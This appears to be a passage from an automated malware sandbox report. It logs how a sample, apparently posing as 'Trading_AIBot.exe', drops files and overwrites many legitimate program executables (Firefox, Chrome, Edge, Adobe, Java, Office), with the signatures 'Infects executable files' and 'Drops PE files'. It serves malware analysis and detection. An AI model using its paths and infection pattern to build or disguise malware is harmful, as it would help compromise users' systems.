Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\AppVClient.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\FXSSVC.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\alg.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Drops PE files
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe File created: C:\Program Files\7-Zip\7z.exe Jump to dropped file
